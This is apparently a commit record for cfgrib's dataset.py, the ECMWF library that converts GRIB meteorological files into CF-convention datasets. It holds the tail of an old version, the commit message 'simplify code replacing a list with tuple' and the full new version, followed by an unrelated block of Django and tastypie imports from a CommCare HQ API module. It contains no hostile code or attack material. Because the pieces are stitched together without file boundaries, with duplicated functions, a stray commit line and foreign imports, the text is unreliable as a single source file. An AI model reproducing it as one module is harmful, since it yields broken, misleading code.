coord_vars[coord_name] = Variable(dimensions=dimensions, data=data, attributes=attributes)
header_dimensions = tuple(d for d, c in coord_vars.items() if not squeeze or c.data.size > 1)
header_shape = tuple(coord_vars[d].data.size for d in header_dimensions)
geo_dims, geo_shape, geo_coord_vars = build_geography_coordinates(first, encode_cf, errors)
dimensions = header_dimensions + geo_dims
shape = header_shape + geo_shape
coord_vars.update(geo_coord_vars)
offsets = {} # type: T.Dict[T.Tuple[int, ...], T.List[T.Union[int, T.Tuple[int, int]]]]
header_value_index = {}
extra_coords_data: T.Dict[str, T.Dict[str, T.Any]] = {
coord_name: {} for coord_name in extra_coords
}
extra_dims = list(extra_coords.values())
for dim in list(header_dimensions) + extra_dims:
if np.isscalar(coord_vars[dim].data):
header_value_index[dim] = {np.asscalar(coord_vars[dim].data): 0}
else:
header_value_index[dim] = {v: i for i, v in enumerate(coord_vars[dim].data.tolist())}
for header_values, offset in index.offsets:
header_indexes = [] # type: T.List[int]
for dim in list(header_dimensions) + extra_dims:
header_value = header_values[index.index_keys.index(coord_name_key_map.get(dim, dim))]
if dim in header_dimensions:
header_indexes.append(header_value_index[dim][header_value])
for coord_name in extra_coords:
coord_value = header_values[
index.index_keys.index(coord_name_key_map.get(coord_name, coord_name))
]
if dim == extra_coords[coord_name]:
saved_coord_value = extra_coords_data[coord_name].get(
header_value, coord_value
)
if saved_coord_value != coord_value:
raise ValueError(
f"'{coord_name}' cannot be indexed by dimension '{extra_coords[coord_name]}': \n"
f"found two '{coord_name}' distinct values ({saved_coord_value}, {coord_value}) "
f"for '{extra_coords[coord_name]}' value {header_value}."
)
extra_coords_data[coord_name][header_value] = coord_value
offsets[tuple(header_indexes)] = offset
missing_value = data_var_attrs.get("missingValue", 9999)
data = OnDiskArray(
stream=index.filestream,
shape=shape,
offsets=offsets,
missing_value=missing_value,
geo_ndim=len(geo_dims),
)
if "time" in coord_vars and "step" in coord_vars:
# add the 'valid_time' secondary coordinate
time_dims, time_data = cfmessage.build_valid_time(
coord_vars["time"].data, coord_vars["step"].data,
)
attrs = COORD_ATTRS["valid_time"]
coord_vars["valid_time"] = Variable(dimensions=time_dims, data=time_data, attributes=attrs)
for coord_name in extra_coords:
coord_data = np.array(list(extra_coords_data[coord_name].values()))
if extra_coords[coord_name] not in header_dimensions:
coord_dimensions: T.Tuple[str, ...] = ()
coord_data = coord_data.reshape(())
else:
coord_dimensions = (extra_coords[coord_name],)
coord_vars[coord_name] = Variable(dimensions=coord_dimensions, data=coord_data,)
data_var_attrs["coordinates"] = " ".join(coord_vars.keys())
data_var = Variable(dimensions=dimensions, data=data, attributes=data_var_attrs)
dims = {d: s for d, s in zip(dimensions, data_var.data.shape)}
return dims, data_var, coord_vars
def dict_merge(master, update):
# type: (T.Dict[str, T.Any], T.Dict[str, T.Any]) -> None
for key, value in update.items():
if key not in master:
master[key] = value
elif master[key] == value:
pass
else:
raise DatasetBuildError(
"key present and new value is different: "
"key=%r value=%r new_value=%r" % (key, master[key], value)
)
def build_dataset_attributes(index, filter_by_keys, encoding):
# type: (messages.FileIndex, T.Dict[str, T.Any], T.Dict[str, T.Any]) -> T.Dict[str, T.Any]
attributes = enforce_unique_attributes(index, GLOBAL_ATTRIBUTES_KEYS, filter_by_keys)
attributes["Conventions"] = "CF-1.7"
if "GRIB_centreDescription" in attributes:
attributes["institution"] = attributes["GRIB_centreDescription"]
attributes_namespace = {
"cfgrib_version": __version__,
"cfgrib_open_kwargs": json.dumps(encoding),
"eccodes_version": messages.eccodes_version,
"timestamp": datetime.datetime.now().isoformat().partition(".")[0][:16],
}
history_in = (
"{timestamp} GRIB to CDM+CF via "
"cfgrib-{cfgrib_version}/ecCodes-{eccodes_version} with {cfgrib_open_kwargs}"
)
attributes["history"] = history_in.format(**attributes_namespace)
return attributes
def build_dataset_components(
index: messages.FileIndex,
errors: str = "warn",
encode_cf: T.Sequence[str] = ("parameter", "time", "geography", "vertical"),
squeeze: bool = True,
log: logging.Logger = LOG,
read_keys: T.Iterable[str] = (),
time_dims: T.Sequence[str] = ("time", "step"),
extra_coords: T.Dict[str, str] = {},
) -> T.Tuple[T.Dict[str, int], T.Dict[str, Variable], T.Dict[str, T.Any], T.Dict[str, T.Any]]:
dimensions = {} # type: T.Dict[str, int]
variables = {} # type: T.Dict[str, Variable]
filter_by_keys = index.filter_by_keys
for param_id in index["paramId"]:
var_index = index.subindex(paramId=param_id)
try:
dims, data_var, coord_vars = build_variable_components(
var_index,
encode_cf,
filter_by_keys,
errors=errors,
squeeze=squeeze,
read_keys=read_keys,
time_dims=time_dims,
extra_coords=extra_coords,
)
except DatasetBuildError as ex:
# NOTE: When a variable has more than one value for an attribute we need to raise all
# the values in the file, not just the ones associated with that variable. See #54.
key = ex.args[1]
error_message = "multiple values for unique key, try re-open the file with one of:"
fbks = []
for value in index[key]:
fbk = {key: value}
fbk.update(filter_by_keys)
fbks.append(fbk)
error_message += "\n filter_by_keys=%r" % fbk
raise DatasetBuildError(error_message, key, fbks)
short_name = data_var.attributes.get("GRIB_shortName", "paramId_%d" % param_id)
var_name = data_var.attributes.get("GRIB_cfVarName", "unknown")
if "parameter" in encode_cf and var_name not in ("undef", "unknown"):
short_name = var_name
try:
dict_merge(variables, coord_vars)
dict_merge(variables, {short_name: data_var})
dict_merge(dimensions, dims)
except ValueError:
if errors == "ignore":
pass
elif errors == "raise":
raise
else:
log.exception("skipping variable: paramId==%r shortName=%r", param_id, short_name)
encoding = {
"source": index.filestream.path,
"filter_by_keys": filter_by_keys,
"encode_cf": encode_cf,
}
attributes = build_dataset_attributes(index, filter_by_keys, encoding)
return dimensions, variables, attributes, encoding
@attr.attrs(auto_attribs=True)
class Dataset(object):
"""
Map a GRIB file to the NetCDF Common Data Model with CF Conventions.
"""
dimensions: T.Dict[str, int]
variables: T.Dict[str, Variable]
attributes: T.Dict[str, T.Any]
encoding: T.Dict[str, T.Any]
def open_fileindex(
path: T.Union[str, "os.PathLike[str]"],
grib_errors: str = "warn",
indexpath: str = "{path}.{short_hash}.idx",
index_keys: T.Sequence[str] = INDEX_KEYS + ["time", "step"],
filter_by_keys: T.Dict[str, T.Any] = {},
) -> messages.FileIndex:
path = os.fspath(path)
index_keys = sorted(set(index_keys) | set(filter_by_keys))
stream = messages.FileStream(path, message_class=cfmessage.CfMessage, errors=grib_errors)
index = stream.index(index_keys, indexpath=indexpath)
return index.subindex(filter_by_keys)
def open_file(
path: T.Union[str, "os.PathLike[str]"],
grib_errors: str = "warn",
indexpath: str = "{path}.{short_hash}.idx",
filter_by_keys: T.Dict[str, T.Any] = {},
read_keys: T.Sequence[str] = (),
time_dims: T.Sequence[str] = ("time", "step"),
extra_coords: T.Dict[str, str] = {},
**kwargs: T.Any,
) -> Dataset:
"""Open a GRIB file as a ``cfgrib.Dataset``."""
index_keys = INDEX_KEYS + list(filter_by_keys) + list(time_dims) + list(extra_coords.keys())
index = open_fileindex(path, grib_errors, indexpath, index_keys, filter_by_keys=filter_by_keys)
return Dataset(
*build_dataset_components(
index, read_keys=read_keys, time_dims=time_dims, extra_coords=extra_coords, **kwargs
)
)
simplify code replacing a list with tuple
#
# Copyright 2017-2021 European Centre for Medium-Range Weather Forecasts (ECMWF).
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors:
# Alessandro Amici - B-Open - https://bopen.eu
# Aureliana Barghini - B-Open - https://bopen.eu
#
import datetime
import json
import logging
import os
import typing as T
import attr
import numpy as np # type: ignore
from . import __version__, cfmessage, messages
LOG = logging.getLogger(__name__)
#
# Edition-independent keys in ecCodes namespaces. Documented in:
# https://software.ecmwf.int/wiki/display/ECC/GRIB%3A+Namespaces
#
GLOBAL_ATTRIBUTES_KEYS = ["edition", "centre", "centreDescription", "subCentre"]
DATA_ATTRIBUTES_KEYS = [
"paramId",
"dataType",
"numberOfPoints",
"typeOfLevel",
"stepUnits",
"stepType",
"gridType",
]
EXTRA_DATA_ATTRIBUTES_KEYS = [
"shortName",
"units",
"name",
"cfName",
"cfVarName",
"missingValue",
"totalNumber",
"numberOfDirections",
"numberOfFrequencies",
"NV",
"gridDefinitionDescription",
]
GRID_TYPE_MAP = {
"regular_ll": [
"Nx",
"iDirectionIncrementInDegrees",
"iScansNegatively",
"longitudeOfFirstGridPointInDegrees",
"longitudeOfLastGridPointInDegrees",
"Ny",
"jDirectionIncrementInDegrees",
"jPointsAreConsecutive",
"jScansPositively",
"latitudeOfFirstGridPointInDegrees",
"latitudeOfLastGridPointInDegrees",
],
"rotated_ll": [
"Nx",
"Ny",
"angleOfRotationInDegrees",
"iDirectionIncrementInDegrees",
"iScansNegatively",
"jDirectionIncrementInDegrees",
"jPointsAreConsecutive",
"jScansPositively",
"latitudeOfFirstGridPointInDegrees",
"latitudeOfLastGridPointInDegrees",
"latitudeOfSouthernPoleInDegrees",
"longitudeOfFirstGridPointInDegrees",
"longitudeOfLastGridPointInDegrees",
"longitudeOfSouthernPoleInDegrees",
],
"reduced_ll": [
"Ny",
"jDirectionIncrementInDegrees",
"jPointsAreConsecutive",
"jScansPositively",
"latitudeOfFirstGridPointInDegrees",
"latitudeOfLastGridPointInDegrees",
],
"regular_gg": [
"Nx",
"iDirectionIncrementInDegrees",
"iScansNegatively",
"longitudeOfFirstGridPointInDegrees",
"longitudeOfLastGridPointInDegrees",
"N",
"Ny",
],
"rotated_gg": [
"Nx",
"Ny",
"angleOfRotationInDegrees",
"iDirectionIncrementInDegrees",
"iScansNegatively",
"jPointsAreConsecutive",
"jScansPositively",
"latitudeOfFirstGridPointInDegrees",
"latitudeOfLastGridPointInDegrees",
"latitudeOfSouthernPoleInDegrees",
"longitudeOfFirstGridPointInDegrees",
"longitudeOfLastGridPointInDegrees",
"longitudeOfSouthernPoleInDegrees",
"N",
],
"lambert": [
"LaDInDegrees",
"LoVInDegrees",
"iScansNegatively",
"jPointsAreConsecutive",
"jScansPositively",
"latitudeOfFirstGridPointInDegrees",
"latitudeOfSouthernPoleInDegrees",
"longitudeOfFirstGridPointInDegrees",
"longitudeOfSouthernPoleInDegrees",
"DyInMetres",
"DxInMetres",
"Latin2InDegrees",
"Latin1InDegrees",
"Ny",
"Nx",
],
"reduced_gg": ["N", "pl"],
"sh": ["M", "K", "J"],
}
GRID_TYPE_KEYS = sorted(set(k for _, ks in GRID_TYPE_MAP.items() for k in ks))
ENSEMBLE_KEYS = ["number"]
VERTICAL_KEYS = ["level:float"]
DATA_TIME_KEYS = ["dataDate", "dataTime", "endStep"]
ALL_REF_TIME_KEYS = [
"time",
"step",
"valid_time",
"verifying_time",
"forecastMonth",
"indexing_time",
]
SPECTRA_KEYS = ["directionNumber", "frequencyNumber"]
ALL_HEADER_DIMS = ENSEMBLE_KEYS + VERTICAL_KEYS + SPECTRA_KEYS
INDEX_KEYS = sorted(
GLOBAL_ATTRIBUTES_KEYS + DATA_ATTRIBUTES_KEYS + DATA_TIME_KEYS + ALL_HEADER_DIMS
)
COORD_ATTRS = {
# geography
"latitude": {"units": "degrees_north", "standard_name": "latitude", "long_name": "latitude"},
"longitude": {"units": "degrees_east", "standard_name": "longitude", "long_name": "longitude"},
# vertical
"depthBelowLand": {
"units": "m",
"positive": "down",
"long_name": "soil depth",
"standard_name": "depth",
},
"depthBelowLandLayer": {
"units": "m",
"positive": "down",
"long_name": "soil depth",
"standard_name": "depth",
},
"hybrid": {
"units": "1",
"positive": "down",
"long_name": "hybrid level",
"standard_name": "atmosphere_hybrid_sigma_pressure_coordinate",
},
"heightAboveGround": {
"units": "m",
"positive": "up",
"long_name": "height above the surface",
"standard_name": "height",
},
"isobaricInhPa": {
"units": "hPa",
"positive": "down",
"stored_direction": "decreasing",
"standard_name": "air_pressure",
"long_name": "pressure",
},
"isobaricInPa": {
"units": "Pa",
"positive": "down",
"stored_direction": "decreasing",
"standard_name": "air_pressure",
"long_name": "pressure",
},
"isobaricLayer": {
"units": "Pa",
"positive": "down",
"standard_name": "air_pressure",
"long_name": "pressure",
},
# ensemble
"number": {
"units": "1",
"standard_name": "realization",
"long_name": "ensemble member numerical id",
},
# time
"step": {
"units": "hours",
"standard_name": "forecast_period",
"long_name": "time since forecast_reference_time",
},
"time": {
"units": "seconds since 1970-01-01T00:00:00",
"calendar": "proleptic_gregorian",
"standard_name": "forecast_reference_time",
"long_name": "initial time of forecast",
},
"indexing_time": {
"units": "seconds since 1970-01-01T00:00:00",
"calendar": "proleptic_gregorian",
"standard_name": "forecast_reference_time",
"long_name": "nominal initial time of forecast",
},
"valid_time": {
"units": "seconds since 1970-01-01T00:00:00",
"calendar": "proleptic_gregorian",
"standard_name": "time",
"long_name": "time",
},
"verifying_time": {
"units": "seconds since 1970-01-01T00:00:00",
"calendar": "proleptic_gregorian",
"standard_name": "time",
"long_name": "time",
},
"forecastMonth": {"units": "1", "long_name": "months since forecast_reference_time"},
}
class DatasetBuildError(ValueError):
def __str__(self) -> str:
return str(self.args[0])
def enforce_unique_attributes(index, attributes_keys, filter_by_keys={}):
# type: (T.Mapping[str, T.Any], T.Sequence[str], T.Dict[str, T.Any]) -> T.Dict[str, T.Any]
attributes = {} # type: T.Dict[str, T.Any]
for key in attributes_keys:
values = index[key]
if len(values) > 1:
fbks = []
for value in values:
fbk = {key: value}
fbk.update(filter_by_keys)
fbks.append(fbk)
raise DatasetBuildError("multiple values for key %r" % key, key, fbks)
if values and values[0] not in ("undef", "unknown"):
attributes["GRIB_" + key] = values[0]
return attributes
@attr.attrs(auto_attribs=True, eq=False)
class Variable(object):
dimensions: T.Tuple[str, ...]
data: np.ndarray
attributes: T.Dict[str, T.Any] = attr.attrib(default={}, repr=False)
def __eq__(self, other):
# type: (T.Any) -> bool
if other.__class__ is not self.__class__:
return NotImplemented
equal = (self.dimensions, self.attributes) == (other.dimensions, other.attributes)
return equal and np.array_equal(self.data, other.data)
def expand_item(item, shape):
# type: (T.Tuple[T.Any, ...], T.Sequence[int]) -> T.Tuple[T.List[int], ...]
expanded_item = []
for i, size in zip(item, shape):
if isinstance(i, (list, np.ndarray)):
expanded_item.append([int(e) for e in i])
elif isinstance(i, slice):
expanded_item.append(list(range(i.start or 0, i.stop or size, i.step or 1)))
elif isinstance(i, int):
expanded_item.append([i])
else:
raise TypeError("Unsupported index type %r" % type(i))
return tuple(expanded_item)
@attr.attrs(auto_attribs=True)
class OnDiskArray(object):
stream: messages.FileStream
shape: T.Tuple[int, ...]
offsets: T.Dict[T.Tuple[T.Any, ...], T.List[T.Union[int, T.Tuple[int, int]]]] = attr.attrib(
repr=False
)
missing_value: float
geo_ndim: int = attr.attrib(default=1, repr=False)
dtype = np.dtype("float32")
def build_array(self) -> np.ndarray:
"""Helper method used to test __getitem__"""
array = np.full(self.shape, fill_value=np.nan, dtype="float32")
with open(self.stream.path, "rb") as file:
for header_indexes, offset in self.offsets.items():
# NOTE: fill a single field as found in the message
message = self.stream.message_from_file(file, offset=offset[0])
values = message.message_get("values", float)
array.__getitem__(header_indexes).flat[:] = values
array[array == self.missing_value] = np.nan
return array
def __getitem__(self, item):
# type: (T.Tuple[T.Any, ...]) -> np.ndarray
header_item_list = expand_item(item[: -self.geo_ndim], self.shape)
header_item = [{ix: i for i, ix in enumerate(it)} for it in header_item_list]
array_field_shape = tuple(len(l) for l in header_item_list) + self.shape[-self.geo_ndim :]
array_field = np.full(array_field_shape, fill_value=np.nan, dtype="float32")
with open(self.stream.path, "rb") as file:
for header_indexes, offset in self.offsets.items():
try:
array_field_indexes = [it[ix] for it, ix in zip(header_item, header_indexes)]
except KeyError:
continue
# NOTE: fill a single field as found in the message
message = self.stream.message_from_file(file, offset=offset[0])
values = message.message_get("values", float)
array_field.__getitem__(tuple(array_field_indexes)).flat[:] = values
array = array_field[(Ellipsis,) + item[-self.geo_ndim :]]
array[array == self.missing_value] = np.nan
for i, it in reversed(list(enumerate(item[: -self.geo_ndim]))):
if isinstance(it, int):
array = array[(slice(None, None, None),) * i + (0,)]
return array
GRID_TYPES_DIMENSION_COORDS = {"regular_ll", "regular_gg"}
GRID_TYPES_2D_NON_DIMENSION_COORDS = {
"rotated_ll",
"rotated_gg",
"lambert",
"lambert_azimuthal_equal_area",
"albers",
"polar_stereographic",
}
def build_geography_coordinates(
first, # type: messages.Message
encode_cf, # type: T.Sequence[str]
errors, # type: str
log=LOG, # type: logging.Logger
):
# type: (...) -> T.Tuple[T.Tuple[str, ...], T.Tuple[int, ...], T.Dict[str, Variable]]
geo_coord_vars = {} # type: T.Dict[str, Variable]
grid_type = first["gridType"]
if "geography" in encode_cf and grid_type in GRID_TYPES_DIMENSION_COORDS:
geo_dims = ("latitude", "longitude") # type: T.Tuple[str, ...]
geo_shape = (first["Ny"], first["Nx"]) # type: T.Tuple[int, ...]
latitudes = np.array(first["distinctLatitudes"], ndmin=1)
geo_coord_vars["latitude"] = Variable(
dimensions=("latitude",), data=latitudes, attributes=COORD_ATTRS["latitude"].copy()
)
if latitudes[0] > latitudes[-1]:
geo_coord_vars["latitude"].attributes["stored_direction"] = "decreasing"
geo_coord_vars["longitude"] = Variable(
dimensions=("longitude",),
data=np.array(first["distinctLongitudes"], ndmin=1),
attributes=COORD_ATTRS["longitude"],
)
elif "geography" in encode_cf and grid_type in GRID_TYPES_2D_NON_DIMENSION_COORDS:
geo_dims = ("y", "x")
geo_shape = (first["Ny"], first["Nx"])
try:
geo_coord_vars["latitude"] = Variable(
dimensions=("y", "x"),
data=np.array(first["latitudes"]).reshape(geo_shape),
attributes=COORD_ATTRS["latitude"],
)
geo_coord_vars["longitude"] = Variable(
dimensions=("y", "x"),
data=np.array(first["longitudes"]).reshape(geo_shape),
attributes=COORD_ATTRS["longitude"],
)
except KeyError: # pragma: no cover
if errors != "ignore":
log.warning("ecCodes provides no latitudes/longitudes for gridType=%r", grid_type)
else:
geo_dims = ("values",)
geo_shape = (first["numberOfPoints"],)
# add secondary coordinates if ecCodes provides them
try:
latitude = first["latitudes"]
geo_coord_vars["latitude"] = Variable(
dimensions=("values",), data=np.array(latitude), attributes=COORD_ATTRS["latitude"]
)
longitude = first["longitudes"]
geo_coord_vars["longitude"] = Variable(
dimensions=("values",),
data=np.array(longitude),
attributes=COORD_ATTRS["longitude"],
)
except KeyError: # pragma: no cover
if errors != "ignore":
log.warning("ecCodes provides no latitudes/longitudes for gridType=%r", grid_type)
return geo_dims, geo_shape, geo_coord_vars
def encode_cf_first(data_var_attrs, encode_cf=("parameter", "time"), time_dims=("time", "step")):
# type: (T.MutableMapping[str, T.Any], T.Sequence[str], T.Sequence[str]) -> T.List[str]
coords_map = ENSEMBLE_KEYS[:]
param_id = data_var_attrs.get("GRIB_paramId", "undef")
data_var_attrs["long_name"] = "original GRIB paramId: %s" % param_id
data_var_attrs["units"] = "1"
if "parameter" in encode_cf:
if "GRIB_cfName" in data_var_attrs:
data_var_attrs["standard_name"] = data_var_attrs["GRIB_cfName"]
if "GRIB_name" in data_var_attrs:
data_var_attrs["long_name"] = data_var_attrs["GRIB_name"]
if "GRIB_units" in data_var_attrs:
data_var_attrs["units"] = data_var_attrs["GRIB_units"]
if "time" in encode_cf:
if set(time_dims).issubset(ALL_REF_TIME_KEYS):
coords_map.extend(time_dims)
else:
raise ValueError("time_dims %r not a subset of %r" % (time_dims, ALL_REF_TIME_KEYS))
else:
coords_map.extend(DATA_TIME_KEYS)
coords_map.extend(VERTICAL_KEYS)
coords_map.extend(SPECTRA_KEYS)
return coords_map
def read_data_var_attrs(first: messages.Message, extra_keys: T.List[str]) -> T.Dict[str, T.Any]:
attributes = {}
for key in extra_keys:
try:
attributes["GRIB_" + key] = first[key]
except:
pass
return attributes
def build_variable_components(
index: messages.FileIndex,
encode_cf: T.Sequence[str] = (),
filter_by_keys: T.Dict[str, T.Any] = {},
log: logging.Logger = LOG,
errors: str = "warn",
squeeze: bool = True,
read_keys: T.Iterable[str] = (),
time_dims: T.Sequence[str] = ("time", "step"),
extra_coords: T.Dict[str, str] = {},
) -> T.Tuple[T.Dict[str, int], Variable, T.Dict[str, Variable]]:
data_var_attrs = enforce_unique_attributes(index, DATA_ATTRIBUTES_KEYS, filter_by_keys)
grid_type_keys = GRID_TYPE_MAP.get(index.getone("gridType"), [])
extra_keys = sorted(list(read_keys) + EXTRA_DATA_ATTRIBUTES_KEYS + grid_type_keys)
first = index.first()
extra_attrs = read_data_var_attrs(first, extra_keys)
data_var_attrs.update(**extra_attrs)
coords_map = encode_cf_first(data_var_attrs, encode_cf, time_dims)
coord_name_key_map = {}
coord_vars = {}
for coord_key in coords_map:
values = index[coord_key]
if len(values) == 1 and values[0] == "undef":
log.debug("missing from GRIB stream: %r" % coord_key)
continue
orig_name = coord_key.partition(":")[0]
coord_name = orig_name
if (
"vertical" in encode_cf
and coord_name == "level"
and "GRIB_typeOfLevel" in data_var_attrs
):
coord_name = data_var_attrs["GRIB_typeOfLevel"]
coord_name_key_map[coord_name] = coord_key
attributes = {
"long_name": "original GRIB coordinate for key: %s(%s)" % (orig_name, coord_name),
"units": "1",
}
attributes.update(COORD_ATTRS.get(coord_name, {}).copy())
data = np.array(sorted(values, reverse=attributes.get("stored_direction") == "decreasing"))
dimensions = (coord_name,) # type: T.Tuple[str, ...]
if squeeze and len(values) == 1:
data = data[0]
dimensions = ()
coord_vars[coord_name] = Variable(dimensions=dimensions, data=data, attributes=attributes)
header_dimensions = tuple(d for d, c in coord_vars.items() if not squeeze or c.data.size > 1)
header_shape = tuple(coord_vars[d].data.size for d in header_dimensions)
geo_dims, geo_shape, geo_coord_vars = build_geography_coordinates(first, encode_cf, errors)
dimensions = header_dimensions + geo_dims
shape = header_shape + geo_shape
coord_vars.update(geo_coord_vars)
offsets = {} # type: T.Dict[T.Tuple[int, ...], T.List[T.Union[int, T.Tuple[int, int]]]]
header_value_index = {}
extra_coords_data: T.Dict[str, T.Dict[str, T.Any]] = {
coord_name: {} for coord_name in extra_coords
}
extra_dims = tuple(extra_coords.values())
for dim in header_dimensions + extra_dims:
if np.isscalar(coord_vars[dim].data):
header_value_index[dim] = {np.asscalar(coord_vars[dim].data): 0}
else:
header_value_index[dim] = {v: i for i, v in enumerate(coord_vars[dim].data.tolist())}
for header_values, offset in index.offsets:
header_indexes = [] # type: T.List[int]
for dim in header_dimensions + extra_dims:
header_value = header_values[index.index_keys.index(coord_name_key_map.get(dim, dim))]
if dim in header_dimensions:
header_indexes.append(header_value_index[dim][header_value])
for coord_name in extra_coords:
coord_value = header_values[
index.index_keys.index(coord_name_key_map.get(coord_name, coord_name))
]
if dim == extra_coords[coord_name]:
saved_coord_value = extra_coords_data[coord_name].get(
header_value, coord_value
)
if saved_coord_value != coord_value:
raise ValueError(
f"'{coord_name}' cannot be indexed by dimension '{extra_coords[coord_name]}': \n"
f"found two '{coord_name}' distinct values ({saved_coord_value}, {coord_value}) "
f"for '{extra_coords[coord_name]}' value {header_value}."
)
extra_coords_data[coord_name][header_value] = coord_value
offsets[tuple(header_indexes)] = offset
missing_value = data_var_attrs.get("missingValue", 9999)
data = OnDiskArray(
stream=index.filestream,
shape=shape,
offsets=offsets,
missing_value=missing_value,
geo_ndim=len(geo_dims),
)
if "time" in coord_vars and "step" in coord_vars:
# add the 'valid_time' secondary coordinate
time_dims, time_data = cfmessage.build_valid_time(
coord_vars["time"].data, coord_vars["step"].data,
)
attrs = COORD_ATTRS["valid_time"]
coord_vars["valid_time"] = Variable(dimensions=time_dims, data=time_data, attributes=attrs)
for coord_name in extra_coords:
coord_data = np.array(list(extra_coords_data[coord_name].values()))
if extra_coords[coord_name] not in header_dimensions:
coord_dimensions: T.Tuple[str, ...] = ()
coord_data = coord_data.reshape(())
else:
coord_dimensions = (extra_coords[coord_name],)
coord_vars[coord_name] = Variable(dimensions=coord_dimensions, data=coord_data,)
data_var_attrs["coordinates"] = " ".join(coord_vars.keys())
data_var = Variable(dimensions=dimensions, data=data, attributes=data_var_attrs)
dims = {d: s for d, s in zip(dimensions, data_var.data.shape)}
return dims, data_var, coord_vars
def dict_merge(master, update):
# type: (T.Dict[str, T.Any], T.Dict[str, T.Any]) -> None
for key, value in update.items():
if key not in master:
master[key] = value
elif master[key] == value:
pass
else:
raise DatasetBuildError(
"key present and new value is different: "
"key=%r value=%r new_value=%r" % (key, master[key], value)
)
def build_dataset_attributes(index, filter_by_keys, encoding):
# type: (messages.FileIndex, T.Dict[str, T.Any], T.Dict[str, T.Any]) -> T.Dict[str, T.Any]
attributes = enforce_unique_attributes(index, GLOBAL_ATTRIBUTES_KEYS, filter_by_keys)
attributes["Conventions"] = "CF-1.7"
if "GRIB_centreDescription" in attributes:
attributes["institution"] = attributes["GRIB_centreDescription"]
attributes_namespace = {
"cfgrib_version": __version__,
"cfgrib_open_kwargs": json.dumps(encoding),
"eccodes_version": messages.eccodes_version,
"timestamp": datetime.datetime.now().isoformat().partition(".")[0][:16],
}
history_in = (
"{timestamp} GRIB to CDM+CF via "
"cfgrib-{cfgrib_version}/ecCodes-{eccodes_version} with {cfgrib_open_kwargs}"
)
attributes["history"] = history_in.format(**attributes_namespace)
return attributes
def build_dataset_components(
index: messages.FileIndex,
errors: str = "warn",
encode_cf: T.Sequence[str] = ("parameter", "time", "geography", "vertical"),
squeeze: bool = True,
log: logging.Logger = LOG,
read_keys: T.Iterable[str] = (),
time_dims: T.Sequence[str] = ("time", "step"),
extra_coords: T.Dict[str, str] = {},
) -> T.Tuple[T.Dict[str, int], T.Dict[str, Variable], T.Dict[str, T.Any], T.Dict[str, T.Any]]:
dimensions = {} # type: T.Dict[str, int]
variables = {} # type: T.Dict[str, Variable]
filter_by_keys = index.filter_by_keys
for param_id in index["paramId"]:
var_index = index.subindex(paramId=param_id)
try:
dims, data_var, coord_vars = build_variable_components(
var_index,
encode_cf,
filter_by_keys,
errors=errors,
squeeze=squeeze,
read_keys=read_keys,
time_dims=time_dims,
extra_coords=extra_coords,
)
except DatasetBuildError as ex:
# NOTE: When a variable has more than one value for an attribute we need to raise all
# the values in the file, not just the ones associated with that variable. See #54.
key = ex.args[1]
error_message = "multiple values for unique key, try re-open the file with one of:"
fbks = []
for value in index[key]:
fbk = {key: value}
fbk.update(filter_by_keys)
fbks.append(fbk)
error_message += "\n filter_by_keys=%r" % fbk
raise DatasetBuildError(error_message, key, fbks)
short_name = data_var.attributes.get("GRIB_shortName", "paramId_%d" % param_id)
var_name = data_var.attributes.get("GRIB_cfVarName", "unknown")
if "parameter" in encode_cf and var_name not in ("undef", "unknown"):
short_name = var_name
try:
dict_merge(variables, coord_vars)
dict_merge(variables, {short_name: data_var})
dict_merge(dimensions, dims)
except ValueError:
if errors == "ignore":
pass
elif errors == "raise":
raise
else:
log.exception("skipping variable: paramId==%r shortName=%r", param_id, short_name)
encoding = {
"source": index.filestream.path,
"filter_by_keys": filter_by_keys,
"encode_cf": encode_cf,
}
attributes = build_dataset_attributes(index, filter_by_keys, encoding)
return dimensions, variables, attributes, encoding
@attr.attrs(auto_attribs=True)
class Dataset(object):
"""
Map a GRIB file to the NetCDF Common Data Model with CF Conventions.
"""
dimensions: T.Dict[str, int]
variables: T.Dict[str, Variable]
attributes: T.Dict[str, T.Any]
encoding: T.Dict[str, T.Any]
def open_fileindex(
path: T.Union[str, "os.PathLike[str]"],
grib_errors: str = "warn",
indexpath: str = "{path}.{short_hash}.idx",
index_keys: T.Sequence[str] = INDEX_KEYS + ["time", "step"],
filter_by_keys: T.Dict[str, T.Any] = {},
) -> messages.FileIndex:
path = os.fspath(path)
index_keys = sorted(set(index_keys) | set(filter_by_keys))
stream = messages.FileStream(path, message_class=cfmessage.CfMessage, errors=grib_errors)
index = stream.index(index_keys, indexpath=indexpath)
return index.subindex(filter_by_keys)
def open_file(
path: T.Union[str, "os.PathLike[str]"],
grib_errors: str = "warn",
indexpath: str = "{path}.{short_hash}.idx",
filter_by_keys: T.Dict[str, T.Any] = {},
read_keys: T.Sequence[str] = (),
time_dims: T.Sequence[str] = ("time", "step"),
extra_coords: T.Dict[str, str] = {},
**kwargs: T.Any,
) -> Dataset:
"""Open a GRIB file as a ``cfgrib.Dataset``."""
index_keys = INDEX_KEYS + list(filter_by_keys) + list(time_dims) + list(extra_coords.keys())
index = open_fileindex(path, grib_errors, indexpath, index_keys, filter_by_keys=filter_by_keys)
return Dataset(
*build_dataset_components(
index, read_keys=read_keys, time_dims=time_dims, extra_coords=extra_coords, **kwargs
)
)
|
from collections import namedtuple
from itertools import chain
from django.conf.urls import url
from django.contrib.auth.models import User
from django.forms import ValidationError
from django.http import Http404, HttpResponse, HttpResponseNotFound
from django.urls import reverse
from django.utils.translation import ugettext_noop
from memoized import memoized_property
from tastypie import fields, http
from tastypie.authorization import ReadOnlyAuthorization
from tastypie.bundle import Bundle
from tastypie.exceptions import BadRequest, ImmediateHttpResponse, NotFound
from tastypie.http import HttpForbidden, HttpUnauthorized
from tastypie.resources import ModelResource, Resource, convert_post_to_patch
from tastypie.utils import dict_strip_unicode_keys
from casexml.apps.stock.models import StockTransaction
from corehq.apps.api.resources.serializers import ListToSingleObjectSerializer
from corehq.apps.sms.models import MessagingEvent, MessagingSubEvent, Email, SMS
from phonelog.models import DeviceReportEntry
from corehq import privileges
from corehq.apps.accounting.utils import domain_has_privilege
from corehq.apps.api.odata.serializers import (
ODataCaseSerializer,
ODataFormSerializer,
)
from corehq.apps.api.odata.utils import record_feed_access_in_datadog
from corehq.apps.api.odata.views import (
add_odata_headers,
raise_odata_permissions_issues,
)
